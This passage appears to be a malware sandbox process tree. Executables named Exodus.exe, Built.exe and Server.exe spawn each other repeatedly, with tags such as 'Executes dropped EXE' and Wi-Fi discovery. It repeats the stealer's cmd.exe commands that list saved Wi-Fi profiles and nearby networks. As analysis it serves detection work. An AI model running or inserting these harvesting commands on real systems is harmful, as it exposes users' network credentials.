C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1796
-
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"5⤵
- Executes dropped EXE
- Drops desktop.ini file(s)
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:924 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All6⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:5196 -
C:\Windows\SysWOW64\chcp.comchcp 650017⤵PID:1368
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show profile7⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:5496
-
-
C:\Windows\SysWOW64\findstr.exefindstr All7⤵PID:4584
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid6⤵PID:440
-
C:\Windows\SysWOW64\chcp.comchcp 650017⤵PID:5476
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show networks mode=bssid7⤵PID:1124
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Exodus.exe"C:\Users\Admin\AppData\Local\Temp\Exodus.exe"4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4672 -
C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
PID:1968 -
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"6⤵
- Executes dropped EXE
PID:5272 -
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5424
-
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"6⤵
- Executes dropped EXE
- Drops desktop.ini file(s)
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5324 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All7⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:6096 -
C:\Windows\SysWOW64\chcp.comchcp 650018⤵PID:1752
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show profile8⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:5984
-
-
C:\Windows\SysWOW64\findstr.exefindstr All8⤵PID:4480
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid7⤵PID:5504
-
C:\Windows\SysWOW64\chcp.comchcp 650018⤵PID:440
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show networks mode=bssid8⤵PID:6132
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Exodus.exe"C:\Users\Admin\AppData\Local\Temp\Exodus.exe"5⤵
- Checks computer location settings
PID:2840 -
C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
PID:5228 -
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"7⤵
- Executes dropped EXE
PID:2480 -
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"8⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5380
-
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"7⤵
- Executes dropped EXE
- Drops desktop.ini file(s)
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:512 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All8⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:456 -
C:\Windows\SysWOW64\chcp.comchcp 650019⤵PID:5760
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show profile9⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:3316
-
-
C:\Windows\SysWOW64\findstr.exefindstr All9⤵PID:5308
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid8⤵PID:4368
-
C:\Windows\SysWOW64\chcp.comchcp 650019⤵PID:4496
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show networks mode=bssid9⤵PID:5384
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Exodus.exe"C:\Users\Admin\AppData\Local\Temp\Exodus.exe"6⤵
- Checks computer location settings
PID:5244 -
C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
PID:3808 -
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"8⤵
- Executes dropped EXE
PID:4504 -
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"9⤵
- Executes dropped EXE
PID:2056
-
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"8⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3068 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All9⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:5772 -
C:\Windows\SysWOW64\chcp.comchcp 6500110⤵PID:2028
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show profile10⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:3552
-
-
C:\Windows\SysWOW64\findstr.exefindstr All10⤵PID:5380
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid9⤵PID:5556
-
C:\Windows\SysWOW64\chcp.comchcp 6500110⤵PID:4496
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show networks mode=bssid10⤵PID:2996
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Exodus.exe"C:\Users\Admin\AppData\Local\Temp\Exodus.exe"7⤵
- Checks computer location settings
PID:2756 -
C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"8⤵
- Checks computer location settings
- Executes dropped EXE
PID:5368 -
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"9⤵
- Executes dropped EXE
PID:5880 -
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"10⤵
- Executes dropped EXE
PID:5944
-
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"9⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5892 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All10⤵PID:1888
-
C:\Windows\SysWOW64\chcp.comchcp 6500111⤵PID:3844
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show profile11⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:4340
-
-
C:\Windows\SysWOW64\findstr.exefindstr All11⤵PID:4988
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid10⤵PID:2376
-
C:\Windows\SysWOW64\chcp.comchcp 6500111⤵PID:4048
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show networks mode=bssid11⤵PID:1828
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Exodus.exe"C:\Users\Admin\AppData\Local\Temp\Exodus.exe"8⤵
- Checks computer location settings
PID:4932 -
C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"9⤵
- Checks computer location settings
- Executes dropped EXE
PID:3200 -
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"10⤵
- Executes dropped EXE
PID:4156 -
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"11⤵
- Executes dropped EXE
PID:4104
-
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"10⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5304 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All11⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:5956 -
C:\Windows\SysWOW64\chcp.comchcp 6500112⤵PID:5500
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show profile12⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:6124
-
-
C:\Windows\SysWOW64\findstr.exefindstr All12⤵PID:3732
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid11⤵PID:5332
-
C:\Windows\SysWOW64\chcp.comchcp 6500112⤵PID:4768
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show networks mode=bssid12⤵PID:440
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Exodus.exe"C:\Users\Admin\AppData\Local\Temp\Exodus.exe"9⤵
- Checks computer location settings
PID:4364 -
C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"10⤵
- Executes dropped EXE
PID:5496 -
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"11⤵PID:6140
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"12⤵PID:2344
-
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"11⤵PID:3572
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All12⤵PID:1964
-
C:\Windows\SysWOW64\chcp.comchcp 6500113⤵PID:1600
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show profile13⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:5700
-
-
C:\Windows\SysWOW64\findstr.exefindstr All13⤵PID:5764
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid12⤵PID:6120
-
C:\Windows\SysWOW64\chcp.comchcp 6500113⤵PID:2548
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show networks mode=bssid13⤵PID:440
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Exodus.exe"C:\Users\Admin\AppData\Local\Temp\Exodus.exe"10⤵PID:5560
-
C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"11⤵PID:6124
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"12⤵PID:5684
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"13⤵PID:5156
-
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"12⤵PID:2152
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All13⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:5424 -
C:\Windows\SysWOW64\chcp.comchcp 6500114⤵PID:5832
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show profile14⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:5912
-
-
C:\Windows\SysWOW64\findstr.exefindstr All14⤵PID:116
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid13⤵PID:4052
-
C:\Windows\SysWOW64\chcp.comchcp 6500114⤵PID:5296
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show networks mode=bssid14⤵PID:5164
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Exodus.exe"C:\Users\Admin\AppData\Local\Temp\Exodus.exe"11⤵PID:3260
-
C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"12⤵PID:5216
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"13⤵PID:5864
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"14⤵PID:3696
-
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"13⤵PID:5228
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All14⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:2688 -
C:\Windows\SysWOW64\chcp.comchcp 6500115⤵PID:3208
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show profile15⤵PID:5716
-
-
C:\Windows\SysWOW64\findstr.exefindstr All15⤵PID:5576
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid14⤵PID:228
-
C:\Windows\SysWOW64\chcp.comchcp 6500115⤵PID:2980
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show networks mode=bssid15⤵PID:456
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Exodus.exe"C:\Users\Admin\AppData\Local\Temp\Exodus.exe"12⤵PID:1772
-
C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"13⤵PID:4828
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"14⤵PID:556
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"15⤵PID:4944
-
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"14⤵PID:2044
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All15⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:3064 -
C:\Windows\SysWOW64\chcp.comchcp 6500116⤵PID:980
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show profile16⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:2876
-
-
C:\Windows\SysWOW64\findstr.exefindstr All16⤵PID:2056
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid15⤵PID:4612
-
C:\Windows\SysWOW64\chcp.comchcp 6500116⤵PID:1448
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show networks mode=bssid16⤵PID:5192
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Exodus.exe"C:\Users\Admin\AppData\Local\Temp\Exodus.exe"13⤵PID:6060
-
C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"14⤵PID:1448
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"15⤵PID:4916
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"16⤵PID:1192
-
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"15⤵PID:1708
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All16⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:4372 -
C:\Windows\SysWOW64\chcp.comchcp 6500117⤵PID:3976
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show profile17⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:5160
-
-
C:\Windows\SysWOW64\findstr.exefindstr All17⤵PID:2548
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid16⤵PID:5232
-
C:\Windows\SysWOW64\chcp.comchcp 6500117⤵PID:1844
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show networks mode=bssid17⤵PID:1936
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Exodus.exe"C:\Users\Admin\AppData\Local\Temp\Exodus.exe"14⤵PID:4368
-
C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"15⤵PID:5496
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"16⤵PID:5296
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"17⤵PID:920
-
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"16⤵PID:5676
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All17⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:4452 -
C:\Windows\SysWOW64\chcp.comchcp 6500118⤵PID:4540
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show profile18⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:6548
-
-
C:\Windows\SysWOW64\findstr.exefindstr All18⤵PID:6560
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid17⤵PID:6224
-
C:\Windows\SysWOW64\chcp.comchcp 6500118⤵PID:5228
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show networks mode=bssid18⤵PID:6756
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Exodus.exe"C:\Users\Admin\AppData\Local\Temp\Exodus.exe"15⤵PID:4328
-
C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"16⤵PID:3964
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"17⤵PID:5124
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"18⤵PID:2836
-
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"17⤵PID:6072
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All18⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:3696 -
C:\Windows\SysWOW64\chcp.comchcp 6500119⤵PID:5900
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show profile19⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:2480
-
-
C:\Windows\SysWOW64\findstr.exefindstr All19⤵PID:552
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid18⤵PID:4360
-
C:\Windows\SysWOW64\chcp.comchcp 6500119⤵PID:440
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show networks mode=bssid19⤵PID:5932
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Exodus.exe"C:\Users\Admin\AppData\Local\Temp\Exodus.exe"16⤵PID:1668
-
C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"17⤵PID:2056
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"18⤵PID:5128
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"19⤵PID:6124
-
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"18⤵PID:5024
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All19⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:2076 -
C:\Windows\SysWOW64\chcp.comchcp 6500120⤵PID:6004
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show profile20⤵PID:4120
-
-
C:\Windows\SysWOW64\findstr.exefindstr All20⤵PID:8
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid19⤵PID:3024
-
C:\Windows\SysWOW64\chcp.comchcp 6500120⤵PID:5648
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show networks mode=bssid20⤵PID:1848
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Exodus.exe"C:\Users\Admin\AppData\Local\Temp\Exodus.exe"17⤵PID:3792
-
C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"18⤵PID:2168
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"19⤵PID:2480
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"20⤵PID:2416
-
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"19⤵PID:2836
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All20⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:6844 -
C:\Windows\SysWOW64\chcp.comchcp 6500121⤵PID:5340
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show profile21⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:6640
-
-
C:\Windows\SysWOW64\findstr.exefindstr All21⤵PID:6652
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid20⤵PID:404
-
C:\Windows\SysWOW64\chcp.comchcp 6500121⤵PID:6404
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show networks mode=bssid21⤵PID:6220
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Exodus.exe"C:\Users\Admin\AppData\Local\Temp\Exodus.exe"18⤵PID:5484
-
C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"19⤵PID:5684
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"20⤵PID:1600
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"21⤵PID:5320
-
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"20⤵PID:5180
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All21⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:4120 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV122⤵PID:5560
-
-
C:\Windows\SysWOW64\chcp.comchcp 6500122⤵PID:5224
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show profile22⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:5160
-
-
C:\Windows\SysWOW64\findstr.exefindstr All22⤵PID:5604
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid21⤵PID:1548
-
C:\Windows\SysWOW64\chcp.comchcp 6500122⤵PID:4560
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show networks mode=bssid22⤵PID:1432
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Exodus.exe"C:\Users\Admin\AppData\Local\Temp\Exodus.exe"19⤵PID:1928
-
C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"20⤵PID:1548
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"21⤵PID:4120
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"22⤵PID:4184
-
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"21⤵PID:2328
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All22⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:6832 -
C:\Windows\SysWOW64\chcp.comchcp 6500123⤵PID:6748
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show profile23⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:7164
-
-
C:\Windows\SysWOW64\findstr.exefindstr All23⤵PID:6916
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid22⤵PID:180
-
C:\Windows\SysWOW64\chcp.comchcp 6500123⤵PID:6600
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show networks mode=bssid23⤵PID:1668
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Exodus.exe"C:\Users\Admin\AppData\Local\Temp\Exodus.exe"20⤵PID:5016
-
C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"21⤵PID:4896
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"22⤵PID:5572
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"23⤵PID:5760
-
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"22⤵PID:6140
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All23⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:6812 -
C:\Windows\SysWOW64\chcp.comchcp 6500124⤵PID:6600
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show profile24⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:5608
-
-
C:\Windows\SysWOW64\findstr.exefindstr All24⤵PID:6360
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid23⤵PID:6116
-
C:\Windows\SysWOW64\chcp.comchcp 6500124⤵PID:5556
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show networks mode=bssid24⤵PID:6528
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Exodus.exe"C:\Users\Admin\AppData\Local\Temp\Exodus.exe"21⤵PID:5632
-
C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"22⤵PID:4280
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"23⤵PID:1892
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"24⤵PID:4496
-
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"23⤵PID:5984
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All24⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:6632 -
C:\Windows\SysWOW64\chcp.comchcp 6500125⤵PID:6996
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show profile25⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:7024
-
-
C:\Windows\SysWOW64\findstr.exefindstr All25⤵PID:6048
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid24⤵PID:4216
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Exodus.exe"C:\Users\Admin\AppData\Local\Temp\Exodus.exe"22⤵PID:5128
-
C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"23⤵PID:5520
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"24⤵PID:3620
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"25⤵PID:4904
-
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"24⤵PID:636
-
-
-
C:\Users\Admin\AppData\Local\Temp\Exodus.exe"C:\Users\Admin\AppData\Local\Temp\Exodus.exe"23⤵PID:3144
-
